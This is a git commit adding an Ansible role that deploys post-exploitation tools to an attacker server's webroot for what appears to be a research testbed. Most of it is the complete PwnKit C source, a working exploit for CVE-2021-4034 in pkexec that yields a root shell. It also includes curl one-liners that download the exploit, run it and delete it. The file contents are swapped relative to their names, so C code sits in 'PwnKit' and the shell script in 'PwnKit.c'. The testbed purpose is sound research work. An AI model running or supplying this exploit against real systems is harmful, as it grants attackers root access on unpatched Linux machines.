initial commit

Author: Wolfgang Hotwagner

README.md

@@ -0,0 +1,52 @@
+AECID-Testbed: PostExploit
+==========================
+
+This role installs some post-exploit-tools to a specific directory. In the AECID Testbed, this will be deployed to the
+webroot of the attacker-server.
+
+Currently the following Tools are Supported:
+
+- LinPEAS(https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
+- PWNkit(https://github.com/ly4k/PwnKit.git)
+
+Requirements
+------------
+
+Any Debian-based Linux Distribution is supported.
+
+Role Variables
+--------------
+
+```
+postexploit_files:
+  - name: linpeas.sh
+    path: linPEAS/linpeas.sh
+  - name: PwnKit
+    path: PwnKit/PwnKit
+
+postexploit_destpath: "/var/www/html"
+postexploit_apache: True
+postexploit_owner: "root"
+postexploit_group: "root"
+```
+
+Example Playbook
+----------------
+
+The following playbook will install apache2 and deploy the post-exploit-tools into the webroot at `/var/www/html`:
+
+```
+- hosts: localhost
+      roles:
+         - role: postexploit
+```
+
+License
+-------
+
+GPL-3.0
+
+Author Information
+------------------
+
+Wolfgang Hotwagner(https://www.ait.ac.at)

defaults/main.yml

@@ -0,0 +1,12 @@
+---
+# defaults file for privesctools
+postexploit_files:
+  - name: linpeas.sh
+    path: linPEAS/linpeas.sh
+  - name: PwnKit
+    path: PwnKit/PwnKit
+
+postexploit_destpath: "/var/www/html"
+postexploit_apache: True
+postexploit_owner: "root"
+postexploit_group: "root"

files/PwnKit/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2022 Oliver Lyak
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

files/PwnKit/Makefile

@@ -0,0 +1,11 @@
+.PHONY: all clean
+all: PwnKit PwnKit32
+
+PwnKit:
+	gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
+
+PwnKit32:
+	gcc -shared -m32 PwnKit.c -o PwnKit32 -Wl,-e,entry -fPIC
+
+clean:
+	rm PwnKit PwnKit32

files/PwnKit/PwnKit

@@ -0,0 +1,149 @@
+// gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
+
+#define _XOPEN_SOURCE 700
+#define _GNU_SOURCE
+#include <dirent.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <ftw.h>
+
+#include <sys/wait.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/signal.h>
+
+// 64-bit library
+#ifdef __amd64__
+const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
+#endif
+// 32-bit library
+#ifdef __i386__
+const char service_interp[] __attribute__((section(".interp"))) = "/lib/ld-linux.so.2";
+#endif
+
+int unlink_cb(const char *fpath, const struct stat *sb, int typeflag, struct FTW *ftwbuf)
+{
+    int rv = remove(fpath);
+
+    if (rv)
+        perror(fpath);
+
+    return rv;
+}
+
+int rmrf(char *path)
+{
+    return nftw(path, unlink_cb, 64, FTW_DEPTH | FTW_PHYS);
+}
+
+void entry()
+{
+    int res;
+    FILE *fp;
+    char buf[PATH_MAX];
+    int pipefd[2];
+    char *cmd;
+    int argc;
+    char **argv;
+    register unsigned long *rbp asm ("rbp");
+
+    argc = *(int *)(rbp+1);
+    argv = (char **)rbp+2;
+
+    res = mkdir("GCONV_PATH=.", 0777);
+    if (res == -1 && errno != EEXIST)
+    {
+        perror("Failed to create directory");
+        _exit(1);
+    }
+
+    res = creat("GCONV_PATH=./.pkexec", 0777);
+
+    res = mkdir(".pkexec", 0777);
+
+    fp = fopen(".pkexec/gconv-modules", "w+");
+    if (fp == NULL)
+    {
+        perror("Failed to open output file");
+        _exit(1);
+    }
+    if (fputs("module UTF-8// PKEXEC// pkexec 2", fp) < 0)
+    {
+        perror("Failed to write config");
+        _exit(1);
+    }
+    fclose(fp);
+
+    buf[readlink("/proc/self/exe", buf, sizeof(buf))] = 0;
+    res = symlink(buf, ".pkexec/pkexec.so");
+    if (res == -1)
+    {
+        perror("Failed to copy file");
+        _exit(1);
+    }
+    
+    pipe(pipefd);
+    if (fork() == 0)
+    {
+        close(pipefd[1]);
+
+        buf[read(pipefd[0], buf, sizeof(buf)-1)] = 0;
+        if (strstr(buf, "pkexec --version") == buf) {
+            // Cleanup for situations where the exploit didn't work
+            puts("Exploit failed. Target is most likely patched.");
+
+            rmrf("GCONV_PATH=.");
+            rmrf(".pkexec");
+        }
+
+        _exit(0);
+    }
+
+    close(pipefd[0]);
+
+    dup2(pipefd[1], 2);
+    close(pipefd[1]);
+
+    cmd = NULL;
+    if (argc > 1) {
+        cmd = memcpy(argv[1]-4, "CMD=", 4);
+    }
+    char *args[] = {NULL};
+    char *env[] = {".pkexec", "PATH=GCONV_PATH=.", "CHARSET=pkexec", "SHELL=pkexec", cmd, NULL};
+    execve("/usr/bin/pkexec", args, env);
+
+    // In case pkexec is not in /usr/bin/
+    execvpe("pkexec", args, env);
+
+    _exit(0);
+    
+}
+
+void gconv() {}
+void gconv_init()
+{
+    close(2);
+    dup2(1, 2);
+
+    char *cmd = getenv("CMD");
+
+    setresuid(0, 0, 0);
+    setresgid(0, 0, 0);
+    rmrf("GCONV_PATH=.");
+    rmrf(".pkexec");
+
+    if (cmd) {
+        execve("/bin/sh", (char *[]){"/bin/sh", "-c", cmd, NULL}, NULL);
+    } else {
+        // Try interactive bash first
+        execve("/bin/bash", (char *[]){"-i", NULL}, NULL);
+
+        // In case interactive bash was not possible
+        execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
+    }
+    _exit(0);
+}

files/PwnKit/PwnKit.c

@@ -0,0 +1,4 @@
+curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit
+chmod +x ./PwnKit || exit
+(sleep 1 && rm ./PwnKit & )
+./PwnKit

files/PwnKit/PwnKit.sh

@@ -0,0 +1,46 @@
+SOURCE: https://github.com/ly4k/PwnKit.git
+
+# PwnKit
+
+Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation
+
+## Usage
+
+Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.
+
+```bash
+sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
+```
+
+![](./imgs/oneliner.png)
+
+### Manually
+
+```bash
+curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
+chmod +x ./PwnKit
+./PwnKit # interactive shell
+./PwnKit 'id' # single command
+```
+
+![](./imgs/exploit.png)
+
+### Patched
+
+Running the exploit against patched versions will yield the following output.
+
+![](./imgs/patched.png)
+
+### Build
+
+```bash
+gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
+```
+
+## Technical Details
+
+- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
+
+## References
+
+- https://github.com/arthepsy/CVE-2021-4034/